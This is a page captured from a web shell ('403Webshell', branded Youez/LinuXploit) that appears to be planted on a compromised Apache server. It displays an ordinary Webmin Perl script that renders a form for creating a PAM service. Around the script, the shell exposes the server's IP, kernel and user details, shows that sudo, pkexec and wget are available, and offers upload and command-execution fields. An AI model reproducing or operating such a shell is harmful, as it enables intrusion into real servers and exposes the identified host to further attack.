403Webshell
Server IP : 182.53.201.61  /  Your IP : 216.73.217.175
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/13386/root/usr/libexec/webmin/pam/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/13386/root/usr/libexec/webmin/pam/create_form.cgi
#!/usr/bin/perl
# create_form.cgi
# Display a form for creating a new PAM service

require './pam-lib.pl';
&ui_print_header(undef, $text{'create_title'}, "");

print "<form action=create_pam.cgi>\n";
print "<table border>\n";
print "<tr $tb> <td><b>$text{'create_header'}</b></td> </tr>\n";
print "<tr $cb> <td><table width=100%>\n";

print "<tr> <td><b>$text{'create_name'}</b></td>\n";
print "<td><input name=name size=20></td> </tr>\n";

print "<tr> <td><b>$text{'create_desc'}</b></td>\n";
print "<td><input name=desc size=30></td> </tr>\n";

print "<tr> <td valign=top><b>$text{'create_mods'}</b></td> <td>\n";
print "<input type=radio name=mods value=0> $text{'create_0'}<br>\n";
print "<input type=radio name=mods value=1 checked> $text{'create_1'}<br>\n";
print "<input type=radio name=mods value=2> $text{'create_2'}\n";
print "</td> </tr>\n";

print "</table></td></tr></table>\n";
print "<input type=submit value='$text{'create'}'></form>\n";

&ui_print_footer("", $text{'index_return'});


Youez - 2016 - github.com/yon3zu
LinuXploit